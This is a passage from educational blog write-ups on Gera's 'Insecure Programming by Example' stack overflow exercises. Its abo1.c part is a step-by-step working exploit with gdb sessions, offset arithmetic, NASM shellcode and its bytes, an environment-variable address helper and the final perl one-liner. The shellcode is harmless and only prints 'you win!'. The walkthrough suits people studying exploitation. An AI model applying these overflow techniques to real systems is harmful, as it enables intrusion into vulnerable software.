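    "b0 01 4b cd 80 e8 e8 ff ff ff 79 6f 75 20 77 69 6e 21"
)


def build_argument(address):
    """Filler up to fn, then the new function pointer, little-endian."""
    padding = BUF_OFFSET - FN_OFFSET     # 280 - 12 = 268 bytes of filler
    return b"A" * padding + struct.pack("<I", address)


payload = build_argument(SHELLCODE_ADDR)

# strcpy() and environment variables both stop at a NUL byte, so neither
# the argument nor the shellcode may contain one.
assert b"\x00" not in payload
assert b"\x00" not in SHELLCODE

print(len(payload), payload[-4:].hex(), len(SHELLCODE))
```

The 268 here is the same number gdb printed for 0xbffff82c-0xbffff720, which is a nice sanity check that the static and dynamic views agree.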

Insecure Programming by Example: abo2.c, not vulnerable…o rly?

Introduction

Note 02/13/2010: This post has been a long time coming (started on 01/15 I think), I’m sorry for the delay. At first, it took me a while to (SPOILER, YOU WILL DIE ALONE) find out that abo2.c was not exploitable under x86 due to the exit() call…I saw this immediately, but it took me a while to believe it. Then, I researched other possible ways it could be exploited, and then searched around for a machine on which to test. I ended up cutting the post short from what I had intended, because I couldn’t get my hands on a PA-RISC machine to test with, and QEMU support for PA-RISC is not quite there yet. The post may be a bit rough, any mistakes are all mine, and I’ll gladly accept corrections anywhere they are needed.

After a long time of head banging (and not the good kind), I finally have something good to report in regards to abo2.c, and I figured I’d write it all up for your enjoyment. Here’s the deal, abo2.c is not vulnerable to code execution on Linux using x86 architectures (the important bit here is x86, not so much Linux). That doesn’t mean it can’t be exploited…these are definitely not the same thing. Many folks state (correctly) that abo2.c is not vulnerable under x86 and then move on.

My thought process is that in my dream job, I’d be working with more architectures than just x86, so why limit myself? Keep in mind the object of the game. You are supposed to win, not just learn a valuable lesson. Ok, so if you just move on, you get the bit about why exit() is a deal breaker…big deal. Why not learn to win? Why not examine some different techniques that could have been applied if this code had been slightly different, or different techniques that could be applied (even better) with the code completely unchanged but compiled on a different processor architecture? The goal is to win and to learn something, so let’s do both! 😉

Let’s talk about the code real quick, and why it’s not vulnerable.

/* abo2.c                                       *
 * specially crafted to feed your brain by gera */

/* This is a tricky example to make you think   *
 * and give you some help on the next one       */

int main(int argv,char **argc) {
	char buf[256];

	strcpy(buf,argc[1]);
	exit(1);
}

What’s new here, as opposed to the abo1.c exercise which we successfully exploited only…weeks ago (I haven’t posted in a while, jeebus)? The only difference is a call to the exit() function at the end of the code. That is a real deal breaker for x86 exploitation, let’s examine why this is the case quickly.

You’ll recall that we’ve been reliably exploiting all of our vulnerable programs so far by overwriting the return address which is saved on main()’s stack frame (frame #0). The thing is, exit never returns to the main() function. As a matter of fact, if you disassemble the main() function you’ll see that there is nothing below the call to exit.

(gdb) disas main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x118
0x080483bd <main+9>:    and    esp,0xfffffff0
0x080483c0 <main+12>:   mov    eax,0x0
0x080483c5 <main+17>:   sub    esp,eax
0x080483c7 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x080483ca <main+22>:   add    eax,0x4
0x080483cd <main+25>:   mov    eax,DWORD PTR [eax]
0x080483cf <main+27>:   mov    DWORD PTR [esp+4],eax
0x080483d3 <main+31>:   lea    eax,[ebp-0x108]
0x080483d9 <main+37>:   mov    DWORD PTR [esp],eax
0x080483dc <main+40>:   call   0x80482c4
0x080483e1 <main+45>:   mov    DWORD PTR [esp],0x1
0x080483e8 <main+52>:   call   0x80482d4
End of assembler dump.

What this means is that execution never returns to the original program from exit. You can verify this behavior yourself by trying to set a breakpoint after exit, or by trying to step over the call to exit; you’ll see that the program merely exits. We can still overwrite the saved return address, but it won’t matter, because the processor will never get back there. Game over man, game over.

The only way to beat this would be to prevent exit() from being called, which is a valid strategy that we should explore. To me, that still fulfills the idea of “gaining control”; sometimes preventing a program from doing something is just as important as making a program do something else…do you think that all the crackers out there make programs authenticate themselves fraudulently, or do they just prevent them from checking the validity of the license? Either path has merit.

Insert Coin to Continue

I was a big fan of arcade games growing up. I had a mean hadouken and dragon punch. Part of getting pretty good at arcade games was not giving up. Keep putting in coins. Keep playing. Get better. If some bastard had the machine monopolized and was beating all comers, well, beg your parents for change, because nothing would make you good faster than getting the tar kicked out of you. For me, abo2.c is that bastard at the machine.

If I have one regret about how I handled this exercise, it’s that I spent too much time pondering and not enough time on the debugger. Too much time Googling, not enough time GDBing. This exercise taught me to not be afraid of disassembling everything, even libc calls, to determine the flow of execution, and it also taught me that the assembled code is really what matters. In the end, I wasted a lot of time re-thinking thoughts when I already knew the answer, abo2.c was NOTVULN on x86 Linux (at least, not vulnerable to code execution…a Denial-of-Service condition exists of course by way of segmentation fault). Once a friend helped me see that this was the case (thanks @kpyke), I resolved to beat the program anyway, in any way I could. I also learned some new stuff I’d like to show you which looked at first blush like solutions on x86, but ended up being inadequate.

What Could Have Been

From “Overwriting the .dtors section.” by Juan M. Bello Rivas:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

static void bleh(void);

int
main(int argc, char *argv[])
{
        static u_char buf[] = "bleh";

        if (argc < 2)
                exit(EXIT_FAILURE);

        strcpy(buf, argv[1]);

        exit(EXIT_SUCCESS);
}

void
bleh(void)
{
        printf("goffio!\n");
}

This paper details how to exploit situations in which you can control execution neither through arbitrary memory writes nor through return address overwrites. I learned a lot from reading it even though it wasn’t a solution for abo2.c on x86, so I suggest you read it as well. I figured it was worth outlining what it could have been a solution to.

Note the differences: he’s declared the buf character array as a static variable, and given it an initial value as well. When he does this, the variable is no longer located on the stack, since a static variable has to persist for the life of the program rather than for the life of a single stack frame. An initialized static variable ends up in the .data section of the executable file, and in older versions of GCC (used at the time the paper was written, but no longer the case since at least 2006, if not earlier) .data comes before .dtors in memory.

What is .dtors? The name is short for “destructors” (while .ctors is for “constructors”). These are not part of the C language itself; they are GCC function attributes that make a function run automatically before main() starts or when the program exits (for instance, to clean up memory allocated on the heap, which C does not do automatically). The .ctors and .dtors sections are how GCC implements constructors and destructors in the ELF file format. Even if the program defines no constructor or destructor functions, GCC still emits the .dtors section; it just leaves the list empty. On exit, the runtime walks the list of function addresses in .dtors and calls each one, stopping when it reaches the terminating NULL entry. Here is what an empty .dtors section looks like:

$ objdump -s -j .dtors bleh

bleh:     file format elf32-i386

Contents of section .dtors:
 804955c ffffffff 00000000                    ........
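For reference, here is roughly what the source side of those sections looks like. This is a minimal sketch of my own, not code from the paper: setup(), teardown() and setup_ran are made-up names, and the attributes are GCC extensions (Clang accepts them too).

```c
#include <stdio.h>

/* Hypothetical flag, only here to show that the constructor really ran. */
static int setup_ran = 0;

/* GCC extension: this function is called before main() is entered. */
__attribute__((constructor))
static void setup(void)
{
    setup_ran = 1;
}

/* GCC extension: this function is called after main() returns or when
 * exit() is called. On the old toolchains discussed here, its address is
 * what would appear in .dtors between the ffffffff and 00000000 words. */
__attribute__((destructor))
static void teardown(void)
{
    puts("teardown: destructor ran");
}
```

Drop these into any program built with gcc and setup() runs before main() while teardown() runs on the way out. Newer toolchains tend to record these functions in different sections, so the objdump output may not match the one above.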

To make it quick(er), if we overwrite the 00000000 value with an address that holds instructions, that address will be jumped to on program exit. If we place our shellcode in an environment variable (see my post on abo1.c or stack5.c for details), we can simply overwrite it with the address of the shellcode and execute whatever we wish, or, as in the author’s example, we can redirect execution flow to another function in memory that otherwise would not be hit. Remember that our statically-declared variable buf is right next to .dtors in memory, and since strcpy() is not doing bounds checking, we can overflow buf into .dtors once we determine the offset, and execute arbitrary code. The paper really is a fun read; I suggest you take a look.

It is also worth mentioning one more paper that is unfortunately not applicable here, but is still an interesting read. “How to hijack the Global Offset Table with pointers for root shells” by c0ntex is an excellent overview of the Procedure Linkage Table and the Global Offset Table, two ripe areas for controlling execution if you are fortunate enough to be able to overwrite the pointers contained therein. In short, the PLT and GOT are how a given program knows where to find a shared library call (such as exit in libc). If we could overwrite the pointers in the table, we could execute arbitrary code in place of the call to exit(). Unfortunately, abo2.c does not present an opportunity to do this, nor do plain linear stack buffer overflows in general, since they can only write to the addresses directly above the buffer. A format string bug would probably be the best way to execute this attack, so far as I know, but it’s still a very interesting read that I encountered doing research for this article.
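To make the idea concrete without touching a real GOT, here is a toy analogy of my own: a single writable function pointer that every call goes through. None of these names come from c0ntex’s paper, and a real GOT entry is filled in by the dynamic linker rather than by the program itself, so treat this strictly as a sketch of the concept.

```c
/* Toy stand-ins for "the real library function" and "the attacker's code".
 * Both names are hypothetical. */
static int real_exit_stub(void) { return 0; }
static int attacker_stub(void)  { return 42; }

/* Plays the role of one GOT slot: a writable pointer consulted on every call. */
static int (*slot)(void) = real_exit_stub;

/* Plays the role of the PLT stub: it jumps to wherever the slot points. */
int call_through_slot(void)
{
    return slot();
}

/* Plays the role of the memory corruption: whoever can write to the slot
 * decides what the next call actually runs. */
void overwrite_slot(void)
{
    slot = attacker_stub;
}
```

Before overwrite_slot() is called, call_through_slot() runs real_exit_stub(); afterwards the very same call site runs attacker_stub(), without the calling code changing at all.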

Architecture is Important

All of our examples so far have been exploited on an x86 virtual machine (powered by the great free tool VirtualBox) running an old, vulnerable version of Linux with many security features disabled, such as non-executable stack protection and address space layout randomization. But in this case, we’ve merely been defeated by the design of the x86 stack. Because the stack grows downward and our overflowed buffer lives on it, the only things we can overwrite sit above buf, and nothing up there gets used before exit() is called.

What if we compiled it on a different architecture? Would it work then? How about an architecture that arranges its stack differently? Not every architecture pushes the return address onto the stack in main memory at call time; some (such as ARM) hold it in a register and only spill it to the stack when the function goes on to call something else. I suppose that speeds things up (just speculation, I know dick all about most of this stuff ;-), I’m sure there’s a trade-off though). Some processors do not grow the stack from high-to-low memory addresses; they instead grow it from low-to-high, just like other constructs such as the heap. What this means is that on those processors the return address of the function that owns the vulnerable buffer is out of reach, because it sits at a lower address than the beginning of the buffer. That does not mean that the processor is a safe haven for unbounded functions, though, not at all.
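If you want to check which way the stack grows on whatever machine you have in front of you, a quick heuristic is to compare the address of a local variable in a caller with one in its callee. This is only a sketch under assumptions: the C standard says nothing about stacks, the function names are mine, and noinline is a GCC/Clang attribute used to keep the callee in its own frame.

```c
#include <stdint.h>

/* Hypothetical helper: reports whether a local in this (callee) frame sits
 * at a lower address than a local in the caller's frame. */
__attribute__((noinline))
static int callee_is_lower(volatile char *caller_local)
{
    volatile char callee_local = 0;
    return (uintptr_t)&callee_local < (uintptr_t)caller_local;
}

/* Returns 1 if the stack appears to grow toward lower addresses (as on
 * x86), 0 if it appears to grow toward higher addresses. */
int stack_grows_down(void)
{
    volatile char caller_local = 0;
    return callee_is_lower(&caller_local);
}
```

On the x86 Linux box used throughout these posts I would expect this to report a downward-growing stack; on an upward-growing architecture the callee’s frame, and with it the callee’s return address, would land above the caller’s buffer instead.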

You probably already realize what this means if you’ve been following along and paying attention. On a stack that grows upward, the frame for strcpy() is created above buf, which means that we can overwrite the return address of the strcpy() function itself. This means that we never need to leave the strcpy() function to gain control (conceptually, at least), and that we don’t have to wait for the end of the program (main’s return address) like we do on x86. This means that we’ll never get to the exit() call, and that abo2.c is exploitable under certain conditions. In researching this technique, I found out that it’s already been done: Phrack #58 Article 11 by Zhodiac covers it, and it’s a really good read if you’ve never done any low level work on “exotic” architectures. So, instead of doing the exploit myself (mainly due to lack of resources, PA-RISC machines are ~$200.00 on eBay and virtualization is essentially non-existent), I’ll just recommend you give Zhodiac’s paper a read.

Man, I’m glad this post is done with. Procrastination is the devil, on to the next challenge!

Insecure Programming by Example: Advanced Buffer Overflows 1

Introexecuduction

Ok, after a nice break, I’m ready to…break :-). I have a couple of Python related posts in my docket, but today we’re going to start work on the next exploit exercises by Gera in his Insecure Programming by Example series, Advanced Buffer Overflows! I hope they aren’t too advanced. This should be refreshing to write about, because I haven’t done any of these yet. On to the code!

Gera says:
Advanced Buffer Overflow #1

blind obedience

What would happen if you store 512 characters where there is only space for 256? You may claim that you can’t, and you’ll be right, but still, there are situations that, unconsciously, you tell the micro to do so, and he can only but obey you… and he’ll do his best without thinking of side effects. Now is when we get technical, fasten your seat belts, this turbulence will last forever.

What defines a buffer overflow is the copy of a memory region into another region not big enough to contain it.

/* abo1.c                                       *
 * specially crafted to feed your brain by gera */

/* Dumb example to let you get introduced...    */

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}

Gera continues:
This is a good and simple abo: on execution this program will copy the contents of argc[1] *1, whatever it is, into the reserved 256 bytes named buf, strcpy() will not do any checks of any kind, it will just copy bytes from source to destination, from argc[1] to buf, until it finds a zero. Here, a chance is given for us to supply a longer-than-expected argc[1] to write in memory past the end of the reserved space named buf. Why is this a security problem? becouse we can change data that we shouldn’t be able to, and usually, this data we can change has a very special meaning for the micro, and by exploiting this meaning, we can confuse the micro and make it do what we want. That’s the secret, go get a debugger, a compiler, and all the tools you think you’ll need, and find out what’s the data after buf and why it’s so important to be able to modify it.

1 – argc and argv are just names for main’s arguments, they just name chunks of bits in memory, their names are not meaningful by their own but for their context.

On a side note, I’m not sure why this compiles correctly without an #include <string.h> for strcpy(), but it does work with even a really old version of gcc. (Most likely it is because older C standards allow calling a function that has not been declared, and gcc only warns about it.) Either way, the notes that Gera provides are well worth reading and understanding. This is actually a fairly easy piece of code to exploit, given what we’ve worked with previously in the stackN.c series. We’ll actually re-use our shellcode from that series to print out “you win!” upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier, where I delve into the generation of the shellcode we’re going to use here.

Exploitimitation

The only change of note for this vulnerable piece of software is the use of the strcpy() function. You may remember we discussed earlier why this function, along with gets() and a bunch of others, is not a good idea to use. It is the use of strcpy() that allows us to overflow the buffer, as it does no bounds-checking on the destination. It just copies whatever you give it until it hits the terminating zero byte of the source, so the copy continues unchecked and can be used, in much the same way we used gets(), to overwrite other areas on the stack (or beyond) to gain control over EIP and hence program execution.
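To see why the missing bounds check matters, here is a sketch of what strcpy() boils down to, next to a bounded variant. Both functions are my own illustrations with made-up names (unbounded_copy and bounded_copy), not libc’s actual implementation.

```c
#include <stddef.h>

/* What strcpy() effectively does: copy bytes until the source's NUL
 * terminator, with no idea how big dst is. Illustrative only. */
char *unbounded_copy(char *dst, const char *src)
{
    char *out = dst;
    while ((*out++ = *src++) != '\0')
        ;  /* keeps going for as long as src does */
    return dst;
}

/* Hypothetical bounded variant: copies at most dst_size - 1 bytes, always
 * NUL-terminates (when dst_size > 0), and returns 1 if src was truncated. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t i = 0;

    if (dst_size == 0)
        return 1;
    while (i + 1 < dst_size && src[i] != '\0') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return src[i] != '\0';
}
```

With a 256-byte buf, unbounded_copy() would happily write a 300-byte argument straight past the end of the array, while bounded_copy(buf, sizeof buf, argc[1]) would stop at 255 bytes and report the truncation.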

What we’re going to do is this:

  1. Determine the location in memory of the variable buf.
  2. Determine the location in memory of the saved EIP within the stack frame for the call to the main() function, using our debugger GDB.
  3. Determine the offset (number of bytes) we need to write before we reach the saved EIP, by subtracting the beginning address of the buf array from the address of the saved EIP. It’s worth noting here that the stack grows from higher addresses to lower addresses (whereas the heap grows in the reverse direction), but a buffer on the stack is still filled from low to high just like anything else, which is something that will take you a while to get into your head permanently. A good (but old) document describing this is at tldp.org, and a thorough overview can be found at linux-mm.org.
  4. Through the first command line argument (a.k.a. argc[1]), send data which will hopefully cause the program to print out “you win!” when main() returns through the overwritten saved EIP.
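Steps 3 and 4 are just arithmetic plus some byte shuffling, so here is a small sketch of them in C. The helper names are mine, the target is assumed to be a 32-bit little-endian x86 process, and the addresses you feed in have to come from your own GDB session.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Step 3: distance in bytes from the start of buf to the saved EIP slot. */
size_t overflow_offset(uint32_t buf_addr, uint32_t saved_eip_addr)
{
    return (size_t)(saved_eip_addr - buf_addr);
}

/* Step 4: `offset` filler bytes followed by the 32-bit target address in
 * little-endian byte order. Returns the payload length, or 0 if `out` is
 * too small. The result is not NUL-terminated. */
size_t build_payload(unsigned char *out, size_t out_size,
                     size_t offset, uint32_t target)
{
    if (out_size < offset + 4)
        return 0;

    memset(out, 'A', offset);                          /* filler up to saved EIP */
    out[offset + 0] = (unsigned char)(target & 0xff);  /* lowest byte goes first */
    out[offset + 1] = (unsigned char)((target >> 8) & 0xff);
    out[offset + 2] = (unsigned char)((target >> 16) & 0xff);
    out[offset + 3] = (unsigned char)((target >> 24) & 0xff);
    return offset + 4;
}
```

For example, overflow_offset(0xbffff510, 0xbffff61c) gives 268 for the addresses that turn up in the GDB session further down, and build_payload() with a target of 0x42424242 produces 268 “A” bytes followed by “BBBB”.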

Let’s get started by compiling the code and examining it in GDB to determine the locations in memory we are concerned with. I will be compiling the binary with the -static option, which links libc directly into the binary instead of loading it as a shared library at runtime. It makes things a bit easier to see sometimes in GDB, but do whatever works for you.

hacking@hacking:~/InsecureProgramming $ gcc -ggdb -static -o abo1 abo1.c
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) list
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) backtrace
#0  main (argv=2, argc=0xbffff864) at abo1.c:10
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/8x buf
0xbffff510:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff520:     0x41414141      0x41414141      0x41414141      0x41414141

We can see the addresses of the points we are interested in: info frame shows the saved eip stored at 0xbffff61c, and x/8x buf shows that buf begins at 0xbffff510. We can also see that, after strcpy() has returned, the buffer does indeed contain a bunch of “A” characters (0x41). Now that we know where everything is, we can do a bit of arithmetic to determine our offset, and then get along to deploying our simple shellcode to take control of the EIP register and make it do what we want.

hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/x buf
0xbffff510:     0x41414141
(gdb) print 0xbffff61c - 0xbffff510
$1 = 268
(gdb) quit
The program is running.  Exit anyway? (y or n) y
hacking@hacking:~/InsecureProgramming $ perl -e 'print "A" x 268 . "BBBB\n";'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, main (argv=0, argc=0xbffff764) at abo1.c:10
10      }
(gdb) next
0x42424242 in ?? ()

Now that we have proven control over EIP by overwriting the saved return address with “B” characters (0x42), we can deliver the shellcode as described in previous tutorials.

Whiskey Tango Foxtrot?

There is one problem left to solve: the variable addresses during a regular run of the program differ from the variable addresses inside GDB. Since this code doesn’t print out the variable addresses at runtime like the stackN.c examples, and since we don’t want to modify the source to do so in the spirit of the exercise, we have to find another reliable way to exploit the program. There are some tricks we can employ here by placing our shellcode into an environment variable, and then using the getenv() C library call to determine the location of that environment variable in the program’s memory. All programs executed from Bash (or any shell, really) inherit the environment variables exported by that shell (viewable with the env command), and those variables are copied into the memory of every child process, near the top of its stack. Once we have the location of the shellcode in the environment variable, we can overwrite the saved EIP with that location and successfully exploit the program. This technique is described in greater detail in Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson (if you can’t tell, this is a pretty good book). Indeed, the getenvaddr.c we’re going to use below is provided for free from the book’s website. But if you’re following along with me here, you should really read this book in its entirety.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}
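The “adjust for program name” line is the interesting part: the heuristic in getenvaddr.c is that every extra character in the program’s name moves the environment variable by two bytes. Here is that same adjustment pulled out into a standalone function so you can play with the numbers. The function name and parameters are mine, and I’ve used signed arithmetic so that a longer target name visibly moves the address down.

```c
#include <stdint.h>
#include <string.h>

/* Same adjustment as getenvaddr.c: given where the variable sits in the
 * helper program (addr_here), estimate where it will sit in the target.
 * this_name is the helper's argv[0]; target_name is how the target will
 * be invoked. Both are assumptions about how you run the two programs. */
uintptr_t predict_env_addr(uintptr_t addr_here,
                           const char *this_name,
                           const char *target_name)
{
    intptr_t delta = ((intptr_t)strlen(this_name) -
                      (intptr_t)strlen(target_name)) * 2;

    return addr_here + (uintptr_t)delta;
}
```

For instance, a helper invoked as ./getenvaddr (12 characters) predicting for ./abo1 (6 characters) adds (12 - 6) * 2 = 12 bytes to the address it sees. The prediction only holds if the target is later launched with exactly the name you passed in, from the same environment.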

We can then load our shellcode into an environment variable and fill the buffer with repeated copies of the shellcode’s address (75 copies is 300 bytes, which comfortably covers the 268-byte offset to the saved EIP), which provides us with much win. I hope this was a pretty informative post, and I really hope you all who are following along (all two of you) consider purchasing these books I’m outlining; they are pretty invaluable as a central collection of knowledge. On to the next challenge!

hacking@hacking:~/InsecureProgramming $ cat abo1_shellcode.s
BITS 32             ;  Tell nasm this is 32-bit code.

jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
pop ecx           ; Pop the return address (string ptr) into ecx.
xor eax, eax      ; Zero out full 32 bits of eax register.
mov al, 4         ; Write syscall #4 to the low byte of eax.
xor ebx, ebx      ; Zero out ebx.
inc ebx           ; Increment ebx to 1, STDOUT file descriptor.
xor edx, edx      ; Zero out edx.
mov dl, 8         ; Length of the string
int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
dec ebx          ; Decrement ebx back down to 0 for status = 0.
int 0x80         ; Do syscall: exit(0)

one:
call two   ; Call back upwards to avoid null bytes
db "you win!" ; the 8-byte string to print (no trailing newline).
hacking@hacking:~/InsecureProgramming $ nasm -o abo1_shellcode abo1_shellcode.s
hacking@hacking:~/InsecureProgramming $ hexdump -C abo1_shellcode
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking:~/InsecureProgramming $ export SHELLCODE=$(cat abo1_shellcode)
hacking@hacking:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=? Y1?? 1?C1?? K??????you win!
hacking@hacking:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo1
SHELLCODE will be at 0xbffff9e1
hacking@hacking:~/InsecureProgramming $ ./abo1 $(perl -e 'print "\xe1\xf9\xff\xbf" x 75;')
you win!hacking@hacking:~/InsecureProgramming $
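
The perl one-liner above simply repeats the four address bytes 75 times. Because the 268-byte offset is a multiple of four, one of those copies lines up exactly with the saved EIP. Here is the same idea as a C sketch; the function name is mine and it assumes a 32-bit little-endian target.

```c
#include <stddef.h>
#include <stdint.h>

/* Writes `count` little-endian copies of `addr` into `out`.
 * Returns the number of bytes written, or 0 if `out` is too small.
 * The result is not NUL-terminated. */
size_t fill_with_address(unsigned char *out, size_t out_size,
                         uint32_t addr, size_t count)
{
    size_t i;

    if (out_size / 4 < count)
        return 0;

    for (i = 0; i < count; i++) {
        out[i * 4 + 0] = (unsigned char)(addr & 0xff);
        out[i * 4 + 1] = (unsigned char)((addr >> 8) & 0xff);
        out[i * 4 + 2] = (unsigned char)((addr >> 16) & 0xff);
        out[i * 4 + 3] = (unsigned char)((addr >> 24) & 0xff);
    }
    return count * 4;
}
```

Called with 0xbffff9e1 and a count of 75, this fills 300 bytes, and bytes 268 through 271 hold e1 f9 ff bf, which is what ends up in the saved EIP. The trick stops working if the distance from buf to the saved EIP is not a multiple of four, in which case you would need to pad the front by one to three bytes.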